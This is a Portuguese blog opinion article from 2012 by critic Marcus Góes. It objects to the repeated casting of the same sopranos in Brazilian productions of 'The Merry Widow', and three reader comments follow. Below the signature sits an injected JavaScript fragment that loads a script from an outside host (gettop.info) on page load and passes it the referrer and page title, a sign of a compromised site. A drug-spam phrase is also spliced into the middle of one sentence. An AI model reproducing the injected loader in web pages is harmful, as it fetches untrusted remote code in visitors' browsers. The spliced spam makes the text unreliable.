Artigo

Rosanas e Elianes cantando demais no Brasil?

“Há Rosanas e Elianes cantando demais no Brasil” – Ali Hassan Ayache.

O crítico e animador cultural ALI HASSAN AYACHE, não suportando a desrespeitosa mesmice de nossos principais teatros e instituições musicais, escreveu em seu conhecido blog, editado em São Paulo: “O cenário lírico nacional anda na mesmice. Sempre os mesmos cantores se apresentam. A hora é de renovar. Temos juitos talentos pelo Brasil afora, esperando oportunidades. (…) Estamos cansados de Rosanas e Elianes”.

O desrespeito ao público encontra perfeita referência nas palavras de Ali. Desrespeito ao  público  e à arte de modo geral, já que a escalação desmedida das cantoras em pauta atravanca o progresso da música em nosso país, o que já foi denunciado por quem escreve.

Em poucos dias, regida pelo Maestro Silvio Viegas, estreará no Palácio das Artes de Belo Horizonte “A VIÚVA ALEGRE”, de Franz Lehar. Adivinhem quem será a protagonista das seis previstas récitas? Nada mais nada menos que a sempiterna ROSANA LAMOSA. Não importa finesteride fast delivery se no Brasil temos várias outras cantoras jovens e bonitas capazes de interpretar a famosa viúva. A Fundação Clóvis Salgado, não se sabe por quais motivos, insiste na mesmice.

O Teatro Municipal do Rio de Janeiro também vai encenar a mesma obra a partir de 28 de novembro e, sem a menor cerimônia, nos ameaça a todos com ROSANA LAMOSA no papel título. O desrespeito é inaceitável.

Certamente essas cantoras não são  más cantoras. Já tive oportunidade de elogiá-las algumas vezes ao escrever sobre espetáculos dos quais tomaram parte. O problema é a insistência em escalá-las.

Leiam outra vez o que diz ALI HASSAN AYACHE em seu blog. “Estamos cansados“,são essas suas tristes mas candentes palavras. A nova geração de cantores tem sido pródiga em talentos no Rio de Janeiro, em São Paulo e em outras cidades. No Rio de Janeiro e em São Paulo, a que sou mais ligado, só de sopranos de primeira  qualidade há muitos, quase todos musicistas jovens e de ótimo aspecto físico. Por que não renovar? Terão sido eles chamados para serem audicionados para A VIÚVA ALEGRE ??

Aqui do Rio de Janeiro torno pública minha solidariedade a ALI HASSAN AYACHE.

MARCUS GÓES-OUT 2012

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; document.currentScript.parentNode.insertBefore(s, document.currentScript);

3 Comments

  1. Da mesma forma endosso as palavras de ambos críticos, meus colegas. Não dá mais para aguentá-las em todas as escalações de óperas e concertos vocais-sinfônicos. Eliane Coelho e Rosana Lamosa ! Deixem outros sopranos cantarem e representarem no Brasil a fora. Isto é uma afronta ao público !

  2. Só um comentário: a “culpa” não é de Rosana Lamosa nem de Eliane Coelho. Se são convidadas, obviamente vão aceitar o que for interessante para elas. Então, na minha opinião, chamar a presença de Rosana na Viúva Alegre do Rio de ameaça e desrespeito não é justo com a cantora, que, por sinal, está muito bem na montagem de BH.

  3. Rita está coberta de razão, caro Marcus. Todo cantor, se convidado e se considerar o papel adequado à sua voz e se tiver as datas livres, provavelmente aceitará o convite. A questão então não está nos cantores, mas em quem os convida e nas “amizades”. E acho que, do exemplo que você citou, o caso da Rosana, sim, é complicado, porque ela não tem voz para cantar tudo que canta. Já a Eliane, não, ela é uma contora formidável. Quanto mais dela, melhor.

Leave a Response

Marcus Góes
Musicólogo, crítico de música e dança e pesquisador. Tem livros publicados também no exterior. Considerado a maior autoridade mundial sobre Carlos Gomes.